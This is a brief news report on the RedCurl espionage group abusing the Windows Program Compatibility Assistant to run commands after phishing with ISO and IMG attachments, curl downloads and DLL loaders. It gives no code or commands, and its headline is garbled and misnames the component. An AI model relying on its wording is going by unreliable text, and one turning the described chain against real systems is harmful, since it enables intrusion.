New Windows Tool: Redcurn Circle Circrats PCA Spy

Company Trend Micro revealed new methods of cyberattacks by the Redcurl group. They are utilizing a legitimate Windows component to carry out malicious commands.

The component, known as Program Compatible Assistant (PCA), was initially designed to address compatibility issues of older programs. Now, attackers have found a way to bypass security systems by using PCA as an alternative command line interpreter.

The Redcurl attack chain involves sending phishing emails with malicious attachments in ISO and IMG formats. These attachments trigger a multi-stage process that starts with loading the Curl utility from a remote server. This utility then serves as a conduit to deliver a booter (MS.dll or PS.dll).

The malicious DLL library then utilizes PCA to kickstart the loading process, establishing a connection with the same domain used by Curl to download the booter. Furthermore, cybercriminals leverage Impacket to execute unauthorized commands.

The Redcurl group, active since 2018 and initially identified in 2019, specializes in cyber espionage. They employ unique tools to pilfer business communications, employee personal data, and legal documents.

Researchers at F.A.C.T. recently uncovered a new malicious Redcurl campaign targeting organizations in Australia, Singapore, and Hong Kong. The attacks have impacted sectors such as construction, logistics, air transportation, and the mining industry.

/Reports, release notes, official announcements.